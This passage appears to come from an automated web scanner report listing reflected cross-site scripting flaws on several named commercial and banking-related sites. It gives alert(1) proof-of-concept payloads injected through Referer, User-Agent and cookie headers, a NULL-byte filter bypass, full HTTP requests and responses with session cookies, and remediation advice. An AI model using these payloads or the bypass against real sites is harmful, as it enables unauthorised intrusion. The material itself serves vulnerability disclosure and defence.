Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=71c11'%3balert(1)//0c64a2d8a24
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:07 GMT Connection: close Content-Length: 46266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeb3b"%3balert(1)//3f4b39407ec was submitted in the Referer HTTP header. This input was echoed as aeb3b";alert(1)//3f4b39407ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=aeb3b"%3balert(1)//3f4b39407ec
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:09 GMT Connection: close Content-Length: 31063
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "aeb3b";alert(1)//3f4b39407ec"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2399d'%3balert(1)//1fd21ed3d2 was submitted in the Referer HTTP header. This input was echoed as 2399d';alert(1)//1fd21ed3d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2399d'%3balert(1)//1fd21ed3d2
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:09 GMT Connection: close Content-Length: 31061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b18'%3balert(1)//6e16c45e18f was submitted in the Referer HTTP header. This input was echoed as 95b18';alert(1)//6e16c45e18f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /questions/ask HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=95b18'%3balert(1)//6e16c45e18f
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Expires: Thu, 03 Feb 2011 16:35:53 GMT Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:53 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:35:53 GMT Connection: close Content-Length: 11928
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93a1d'%3balert(1)//1261bf759ea was submitted in the Referer HTTP header. This input was echoed as 93a1d';alert(1)//1261bf759ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /questions/filter/bank HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=93a1d'%3balert(1)//1261bf759ea
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:55 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:35:54 GMT Connection: close Content-Length: 49014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60377</script><script>alert(1)</script>5e2b578442b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:14:04 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20813
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=60377</script><script>alert(1)</script>5e2b578442b"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3575c"-alert(1)-"7068f2207e8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif HTTP/1.1 Host: www.supermedia.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389
Response (redirected)
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:13:57 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20791
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ba07d"-alert(1)-"85da7928a00 was submitted in the Referer HTTP header. This input was echoed as ba07d"-alert(1)-"85da7928a00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:13:59 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 24677
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="%00ba07d"-alert(1)-"85da7928a00"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af436"-alert(1)-"c8d45d1ae80 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750668049-www.superpages.com-11243779-100942; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:08 GMT; Path=/ Set-Cookie: JSESSIONID=70291ECCDC9094D55B86156B11544BBB; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:31:07 GMT Content-Length: 65808
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]...
var remote_add = "REMOTE_ADDR=173.193.214.243"; var http_user = "HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80"; var datServ = 'http://ugc-int.superpages.com'; var imgLoc = "http://img.superpages.com/images-yp/sp/images/ugc/"; var imServ = 'http://media.superpages.com/media/photos/'; var lidforpageload = '2118 ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae894"-alert(1)-"9ef9bbddbcc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3?command=makeThisMyHome&hp_pref=r HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq; Referer: http://www.google.com/search?hl=en&q=ae894"-alert(1)-"9ef9bbddbcc
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:17 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:10:17 GMT Vary: User-Agent,Cookie Content-Length: 5930 Set-Cookie: USIB2G=0000uiCjKm5hpdCoVHLx-JRHofH:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59a51'-alert(1)-'a6f6442db was submitted in the V cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1
Response
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1.1 Set-Cookie: V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:52 GMT; Path=/ Pragma: no-cache Cache-Control: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 214 Date: Thu, 03 Feb 2011 18:54:52 GMT
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 591c4"-alert(1)-"65b65c1c305 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=125 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:59 GMT Connection: close Content-Length: 2549
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='';var zzC ...[SNIP]... );}
var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc04b"-alert(1)-"93a36e51360 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ba9d"-alert(1)-"5d6a06513d5 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; 